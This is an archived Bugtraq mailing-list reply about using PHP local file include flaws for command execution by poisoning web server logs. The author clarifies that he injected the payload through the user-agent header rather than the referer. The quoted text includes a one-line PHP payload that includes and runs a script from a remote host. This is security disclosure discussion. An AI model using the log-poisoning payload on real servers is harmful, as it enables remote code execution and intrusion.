Re: using php local file include vulnerabilities for command execution

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: using php local file include vulnerabilities for command execution
From: Andreas Zeidler <az@xxxxxxx>
Date: Tue, 11 Oct 2005 19:44:39 +0200
Cc: Maksymilian Arciemowicz <max@xxxxxxxxxxxx>
In-reply-to: <20051011163415.GA9763@xxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20051011163415.GA9763@xxxxxxx>
User-agent: Mutt/1.5.10i

On Tue, Oct 11 18:34, Andreas Zeidler <az@xxxxxxx> wrote:
> the idea that hit me before falling asleep was to send the code i needed
> (like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the
> referer string, this way having the web server write it into a file

well, i actually used the user-agent here, not the referer.  but i guess
unless the server checks if the given referer represents a valid url i
won't make much difference...


> andi

-- 
zeidler it consulting - http://zitc.de/ - info@xxxxxxx
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/

Attachment: signature.asc
Description: Digital signature

References:
- using php local file include vulnerabilities for command execution
  - From: Andreas Zeidler

Prev by Date: MDKSA-2005:179 - Updated openssl packages fix vulnerabilities
Next by Date: MDKSA-2005:178 - Updated squirrelmail packages fixes XSS vulberability
Previous by thread: using php local file include vulnerabilities for command execution
Next by thread: MDKSA-2005:180 - Updated xine-lib packages fixes cddb vulnerability
Index(es):
- Date
- Thread